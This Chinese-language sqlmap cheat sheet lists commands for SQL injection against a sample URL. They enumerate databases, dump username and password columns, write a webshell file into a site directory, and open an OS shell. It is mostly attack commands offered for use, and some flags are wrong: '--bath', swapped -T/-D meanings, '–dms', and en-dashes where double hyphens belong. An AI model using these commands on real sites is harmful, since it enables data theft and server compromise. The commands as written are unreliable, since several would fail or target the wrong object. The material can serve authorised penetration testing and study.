sqlmap基礎使用

sqlmap -u xxx 測試注入

sqlmap -u xxx -dbms 數據庫類型 

sqlmap -u --columns 列出全部字段

sqlmap -u xxx --tables 列出全部表

sqlmap -u xxx --dbs 列出全部庫

sqlmap -u xxx --bath 自動輸入y

sqlmap -u xxx --current-db 列出當前使用的庫

sqlmap -u xxx --current-users 列出當前數據庫使用的帳戶

sqlmap -u xxx --users 列出全部用戶

sqlmap -u xxx --passwords 列出全部密碼

sqlmap -u xxx -T 數據庫 -D 表 -C "字段名" --dump 爆字段內容

 

進階

sqlmap -u xxxx  -cookie"id=xx" -level 2 cookie注入 只有level2纔會檢測cookie

注入成功後

獲取數據庫基本信息

sqlmap -u 「 http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 3 --dbs

查詢有哪些數據庫

sqlmap -u 「 http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 3 -D test --tables

查詢test數據庫中有哪些表

sqlmap -u 「 http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 3 -D test -T admin --columns

查詢test數據庫中admin表有哪些字段

sqlmap -u 「 http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 3 -D test -T admin -C 「username,password」 --dump

dump出字段username與password中的數據

其餘命令參考下面

從數據庫中搜索字段

sqlmap -r 「c:\tools\request.txt」 –dbms mysql -D dedecms –search -C admin,password

在dedecms數據庫中搜索字段admin或者password。

讀取與寫入文件

首先找須要網站的物理路徑，其次須要有可寫或可讀權限。

–file-read=RFILE 從後端的數據庫管理系統文件系統讀取文件 （物理路徑）

–file-write=WFILE 編輯後端的數據庫管理系統文件系統上的本地文件 （mssql xp_shell）

–file-dest=DFILE 後端的數據庫管理系統寫入文件的絕對路徑

#示例：

sqlmap -r 「c:\request.txt」 -p id –dbms mysql –file-dest 「e:\php\htdocs\dvwa\inc\include\1.php」 –file-write 「f:\webshell\1112.php」

使用shell命令：

sqlmap -r 「c:\tools\request.txt」 -p id –dms mysql –os-shell

接下來指定網站可寫目錄：

「E:\php\htdocs\dvwa」

#注：mysql不支持列目錄，僅支持讀取單個文件。sqlserver能夠列目錄，不能讀寫文件，但須要一個（xp_dirtree函數）

sqlmap詳細命令：

• --is-dba 當前用戶權限（是否爲root權限）
• --dbs 全部數據庫
• --current-db 網站當前數據庫
• --users 全部數據庫用戶
• --current-user 當前數據庫用戶
• --random-agent 構造隨機user-agent
• --passwords 數據庫密碼
• --proxy http://local:8080 –threads 10 (能夠自定義線程加速) 代理
• --time-sec=TIMESEC DBMS響應的延遲時間（默認爲5秒）